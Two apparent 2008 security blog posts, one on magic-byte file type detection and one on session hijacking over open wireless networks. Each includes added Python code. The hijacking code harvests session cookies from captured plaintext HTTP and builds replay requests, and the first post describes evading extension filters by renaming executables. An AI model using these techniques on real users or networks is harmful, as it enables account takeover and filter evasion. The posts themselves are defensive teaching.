Monday, July 21, 2008

Magic bytes

File type detection is crucial when attempting to block specific file types from being downloaded in a corporate environment for security or legal reasons. Renaming a file's extension is a rudimentary way of bypassing security filters, yet it is surprisingly still effective in certain scenarios. Ever tried sending an executable file over the MSN network? The Windows Live Messenger client will display the error message "The file you attempted to send has been detected as potentially unsafe and was not sent." Have you tried renaming .exe to .doc? OMG... it works!!!
This is a perfect example of why filtering by file extension alone is weak. The more robust method of file type detection is "magic bytes" matching: many file formats can be identified by a fixed signature at the start of the file (the header), or by the combination of a header and a footer. A Windows executable starts with the hex bytes "4D 5A", the ASCII "MZ", no matter what the file is called. Two caveats a filter author should keep in mind: the signature identifies the container format, not whether the content is safe (a macro-laden Office document carries the same bytes as a harmless one), and some formats, plain text for one, have no fixed signature at all, so magic-byte matching complements other controls rather than replacing them.

PDF files, on the other hand, are identified by their header and footer together: they begin with "%PDF-" (25 50 44 46 2D) followed by the version number, and end with the "%%EOF" marker (25 25 45 4F 46), usually followed by a trailing newline. A file with the header but no footer is either truncated or has data appended to it, which is worth flagging rather than silently accepting.

Don't believe me? Give it a go. Download the HxD hex editor and open a few files in hex view. Rename the extensions and open them again: the contents, signature included, do not change.
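As an added example (not code from the original post), here is a small content-based type check in Python built on the two signatures discussed above, the MZ header and the PDF header plus footer, and extended with PNG and ZIP as further instances of the same idea. It also goes one step beyond a bare "MZ" match by following the e_lfanew field at offset 0x3C to the "PE\0\0" signature, which separates a real Windows executable from anything that merely starts with those two bytes. All sample files are constructed byte strings, not real programs or documents, and the names and helpers are my own.

```python
# Added example, not code from the original post: a minimal content-based file
# type check built on the signatures discussed above (MZ header, PDF header and
# footer), extended to PNG and ZIP as further instances of the same idea.
# All sample inputs below are constructed byte strings, not real files.

# (type name, header bytes, footer bytes or None when the format has no fixed trailer)
SIGNATURES = [
    ("PE executable", b"MZ", None),                    # 4D 5A: the DOS stub every Windows EXE/DLL starts with
    ("PDF", b"%PDF-", b"%%EOF"),                       # 25 50 44 46 2D ... 25 25 45 4F 46
    ("PNG", b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),  # 8-byte signature ... IEND chunk plus its CRC
    ("ZIP container", b"PK\x03\x04", None),            # also .docx/.xlsx/.jar: identifies the container, not its contents
]


def has_pe_signature(data: bytes) -> bool:
    # An MZ header alone could be a DOS program; a real PE also has "PE\0\0" at the
    # offset stored in the little-endian e_lfanew field at 0x3C.
    if len(data) < 0x40:
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def detect_type(data: bytes) -> str:
    """Classify a file body by its magic bytes; the file name is never consulted."""
    # Trailing newlines after %%EOF or IEND are common and harmless, so ignore them
    # for the footer check.
    tail = data.rstrip(b"\r\n\t ")
    for name, header, footer in SIGNATURES:
        if not data.startswith(header):
            continue
        if footer is not None and not tail.endswith(footer):
            # Header matches but the trailer does not: truncated download, or
            # a file with junk appended. Still the declared type, but flag it.
            return f"{name} (truncated or trailing data)"
        if name == "PE executable" and not has_pe_signature(data):
            return "MZ header only (DOS stub, no PE signature)"
        return name
    return "unknown"


def extension_of(filename: str) -> str:
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def should_block(data: bytes, blocked_types=("PE executable",)) -> bool:
    """Content-based policy: decide on what the bytes are, not on what the name claims."""
    return detect_type(data) in blocked_types


def classify_files(files: dict) -> dict:
    """Map filename -> (claimed extension, detected type, blocked?) for a batch of files."""
    return {
        name: (extension_of(name), detect_type(body), should_block(body))
        for name, body in files.items()
    }


# Constructed samples: an executable-shaped header (MZ, e_lfanew -> "PE\0\0") with
# no code behind it, and a minimal PDF-shaped body.
SAMPLE_EXE = b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x00" * 20
SAMPLE_PDF = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
              b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")

SAMPLE_FILES = {
    "setup.exe": SAMPLE_EXE,
    "setup.doc": SAMPLE_EXE,    # same bytes, renamed to slip past an extension filter
    "report.pdf": SAMPLE_PDF,
    "report.txt": SAMPLE_PDF,
}

if __name__ == "__main__":
    for name, (ext, kind, blocked) in classify_files(SAMPLE_FILES).items():
        print(f"{name:12} ext={ext:4} content={kind:16} blocked={blocked}")
```

Run as a script it lists each sample twice, once under its honest name and once renamed, and the detected type and block decision are identical for both, which is the whole point: the bytes did not move when the name did. The ZIP entry is deliberately labelled "container" because .docx, .jar and plain .zip all share it; a real filter would need to look inside the archive before deciding anything about its contents.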

Tuesday, July 15, 2008

Session hijacking

Imperva defines session hijacking as "the act of taking control of a user session after successfully obtaining or generating an authentication session ID... involves an attacker using captured, brute forced or reverse-engineered session IDs to seize control of a legitimate user's Web application session while that session is still in progress".
I demonstrate session hijacking using a combination of tools called Ferret and Hamster as well as my own private wireless network. No neighbours or wireless users were harmed during this recording. The use of Internet Explorer is to simulate another party (i.e. the "victim") sharing the same open wireless network (e.g. free wireless at Starbucks). Ferret sniffs the unencrypted traffic in the air and collects useful information into a text file. From Firefox, I access Gmail to show the login page and verify that I did not cheat by logging in earlier. Hamster is then utilised to present web session-related information in the form of hyperlinks which I click to present me (i.e. the "attacker") with easy access to active sessions. Voila! You have been hijacked!

The higher res version of this demo can be downloaded here.

To avoid being hijacked, avoid logging into websites that do not support HTTPS on open wireless networks. Note that HTTPS on the login page alone is not enough: if the site drops back to plain HTTP after you log in, the session cookie travels in the clear on every subsequent request, and that cookie is exactly what the sniffer collects. The site has to serve the whole session over HTTPS and mark the cookie with the Secure attribute so the browser never sends it over HTTP at all. If you don't want to be snooped on, don't use public networks, period; if you must, a VPN at least puts the plaintext inside an encrypted tunnel between you and the VPN endpoint.
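As an added example (not the Ferret or Hamster source, which this post does not reproduce), here is the core of what those two tools do in Python, run against constructed plaintext HTTP captures rather than live wireless traffic: parse each request, pull the Cookie header per host (the Ferret step), then build the request the attacker's browser would send with the cloned cookies (the Hamster step). The last function checks a Set-Cookie header for the Secure attribute, which is what stops the cookie from being sent over HTTP even when the login itself was over HTTPS. Host names, cookie names and values are made up, and the function names are my own.

```python
# Added example, not the Ferret or Hamster source: the core of what a sidejacking
# tool does once a plaintext HTTP request crosses an open wireless network, run
# here against constructed captures rather than live traffic. Hosts and cookie
# values are made up.

# Two requests "sniffed" from the same victim: a webmail session and a forum.
CAPTURED_REQUESTS = [
    (b"GET /mail/ HTTP/1.1\r\n"
     b"Host: mail.example.com\r\n"
     b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0)\r\n"
     b"Cookie: SID=abc123def456; PREF=ID=xyz:LD=en\r\n"
     b"Accept: text/html\r\n"
     b"\r\n"),
    (b"GET /index.php HTTP/1.1\r\n"
     b"Host: forum.example.org\r\n"
     b"Cookie: phpsessid=9f2c1e\r\n"
     b"\r\n"),
]


def parse_http_request(raw: bytes) -> dict:
    """Split a raw request into method, target and a header name -> [values] map."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return {"method": method, "target": target, "version": version, "headers": headers}


def harvest_cookies(raw: bytes):
    """Return (host, {cookie name: value}) for one request; this is the Ferret step."""
    req = parse_http_request(raw)
    host = req["headers"].get("host", [""])[0]
    cookies = {}
    for header in req["headers"].get("cookie", []):
        for pair in header.split(";"):
            name, _, value = pair.strip().partition("=")
            if name:
                cookies[name] = value       # value may itself contain '=' (PREF=ID=...)
    return host, cookies


def harvest_sessions(captures) -> dict:
    """Group cookies by host across everything seen on the wire."""
    sessions = {}
    for raw in captures:
        host, cookies = harvest_cookies(raw)
        if host and cookies:
            sessions.setdefault(host, {}).update(cookies)
    return sessions


def build_replay_request(host: str, cookies: dict, target: str = "/") -> bytes:
    """The request the attacker's browser sends with the cloned cookies; this is the
    Hamster step (Hamster does it by acting as a local proxy, here it is just bytes)."""
    cookie_header = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (f"GET {target} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_header}\r\n\r\n").encode()


def set_cookie_weaknesses(set_cookie_value: str) -> list:
    """Why the attack worked: without the Secure attribute the browser sends the
    session cookie over plain HTTP even if the login itself used HTTPS."""
    attrs = [a.strip().lower() for a in set_cookie_value.split(";")[1:]]
    issues = []
    if "secure" not in attrs:
        issues.append("missing Secure: cookie will be sent over plain HTTP")
    if "httponly" not in attrs:
        issues.append("missing HttpOnly: cookie readable by page script")
    return issues


if __name__ == "__main__":
    for host, cookies in harvest_sessions(CAPTURED_REQUESTS).items():
        print(f"[{host}] {cookies}")
        print(build_replay_request(host, cookies).decode())
    print(set_cookie_weaknesses("SID=abc123def456; Path=/; HttpOnly"))
```

Nothing here needs the victim's password: the server accepts the replayed cookie as proof of the session, which is why the demo works even though the login form was served over HTTPS. Feeding the same site's Set-Cookie header into set_cookie_weaknesses shows the fix on the server side; on the client side the only defences are the ones in the paragraph above.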